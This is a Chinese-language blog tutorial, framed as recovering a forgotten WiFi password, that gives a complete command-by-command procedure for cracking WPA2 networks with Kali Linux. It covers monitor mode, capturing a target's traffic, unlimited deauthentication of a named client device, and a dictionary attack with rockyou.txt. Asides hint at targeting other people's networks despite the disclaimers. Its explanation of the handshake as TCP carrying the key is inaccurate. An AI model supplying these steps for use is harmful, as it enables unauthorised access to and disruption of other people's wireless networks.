admin管理员组文章数量:1516870
前提(不适合小白,适合初学)
本文章提供仅学习,研究,参考 ,不提供技术支持,如出现使用违法情况,与作者无关,阅读使用者自行承担相应法律责任,有必要联系我删除文章!!!
Kall系统下载官网:谷歌浏览器访问
1.Kali 2022版本
2.账号kali 密码 kali
3.建议命令前面 使用sudo (临时权限)
4. VMware Workstation 15.5以上 虚拟机
5. 在虚拟机安装好kail linunx系统 ( 具体怎么安装……度,so,bing,google一下 )
6. 无线网卡(芯片为3070 以上 、 1887L 、 3072L 都 可以 支持Linux 系统 ) 补充:普通的网卡不支持监听功能
无线网卡监听收发-破解wifi密码
P1.简化(解决方案、图片、解释不提供-只提供命令注释过程,想看细节以及解决问题p2 ):
(命令+注释)
- sudo airmon-n g ----检查网卡是否正常
- I fconfig ----查看网卡信息(无线默认名称wlan0)
- sudo airmon-ng start wlan0 ----开启网卡监听模式
- I wconfig ----查看wlan0网卡信息 (变成wlan0mon)
- sudo airodump-ng wlan0mon ----开始扫描wifi信号
- sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon
解释:--bssid = wifi的型号mac地址 、-c = 信号通道 , -w = 文件前名字(名字.wifi.01_1cap)
7、sudo aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon
解释:-0 数字(攻击次数), -c 手机、平板、电脑等其他设备mac地址 ,-a wifi设备mac地址
8、 解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz
gzip -d/usr/share/wordlists/rockyou.txt.gz
9、键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap
耐心等待密码破解吧…
P 2.细化(提供图片过程、说明、扩展,解决、适合初学者、需要一定网络、程序知识)
第一步:打开VM虚拟机(16.5)里面的kali系统
等待进入系统……
好的,进入到系统登录界面了,有没有认真看前提呢?密码是什么呢?
能登录成功,说明你有真正的在学习呢!泪目wu……
哎嘿!好了好了我们往下第二步吧
第二步:
Ctrl+alt+T打开终端程序
输入: sudo airmon-ng ( 哎哎先不要急输入命令 )
扩展:虚拟机先做个快照然后再去做实验(具体怎么做快照,enmmm,我就不多说了)
输入出现:su: user airmon-ng does not exist or the user entry does not contain all the required fields(目录不存在)
解决方法如下: 先在window主机上按win+r键然后输入services.msc 回车
找到 VMware USB Arbitration Service ,双击
启动类型改为 自动 2. 启动 服务状态3. 确定
开 的设置,改成跟下图一样(如果为灰色无法更改,则需要关闭kail系统后再改)
将usb无线网卡插在电脑上,( 我这里是淘宝买的3072L芯片的网卡 )
点击 虚拟机 > 可移动设备 > 选择 802.11n WLAN 的 > 连接
命令ifconfig查看网卡信息,天啊!出现了wlan0!说明已经连接成功了
那就输入命令 sudo airmon-ng start wlan0 开启网卡监听模式吧 嗨哎嗨!
输入 iwconfig 命令查看网卡信息, wlan0mon网卡名加了mon则表示成功
命令 sudo airodump-ng wlan0mon ,开始扫描WiFi,按ctrl+c结束任务
我这里说明一下傲!
BSSID:指wifi的mac地址就是设备的物理地址
PWR:wifi距离你接收的信号强度,数值小说明,离你近
DATA:上行和下行的数据包,越大数据说明有人在下载或者播放不可描述的……
CH:一般家用2.4G信道为13个(1-13数字)
ESSID:wifi的名称(中文命名可能会****)
好吧,我已经介绍完了接下来输入你抓到的数据去……额 学习!!!!
sudo airodump-ng --bssid BSSID -c 信道频率 -w 存储的路径名称 wlan0mon
新打开终端
进入/home文件夹:cd /home
创建一个叫wifi的文件夹 来放抓包数据:sudo mkdir “文件路径” 补充:如果要删除文件 请使用rm来删除:sudo rm -f “ 文件路径 ”
哎!不懂怎么删除创建和 “../ ./ ”什么意思、查看,建议去温习一下Linux基本指令再来做实验
用LS、LL、LS-a查看已经创建成功,没创建成功命令前面加sudo (调用临时root权限)
创建好文件夹-继续输入你想研究的对象……呸是wifi的mac地址和信道。。如下命令
sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon
数据包已经正在抓取
重点的来了!!!
sudo aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon
注意!:在敲上面的命令的时候↑
先把全局扫描wifi关了,会一定的影响到信道抓包
-0 0 : 发送的干扰包次数
-c : 手机、平板、笔记本、电视设备的mac地址
-a:wifi mac地址
wlan0mon :最后是网卡名称(一般就是这个名字)
原理是 发送伪造帧攻击 让对方的连接中wifi掉线,然后进行重连,中间会发送tcp包含三次握手里面有wifi密码w pa 2加密密钥
回到监听画面,出现wpa handshake的时候就抓包成功了
抓完包记得关掉:停止wlan0mon 监听 :sudo airmon-ng wlan0mon
两个终端都要按Ctrl+c停止哦!,要不然那边会一直连接不到wifi哈哈!
cd打开抓包的目录,ls列出来,就看到我们抓到的数据包 “wifi-0.1.cap”这个就是握手包
解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz
S udo gzip -d/usr/share/wordlists/rockyou.txt.gz
输入sudo aircrack-ng -w 字典路径 握手包路径,回车后开始爆破
S udo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi/wifi-0.1.cap
禁止!使用非法用途!违规者自己承担法律责任,与作者无关!在此声明!
版权声明:本文标题:忘记WiFi密码?一招搞定,让你重新连接网络世界! 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.betaflare.com/biancheng/1770592827a3256367.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。


发表评论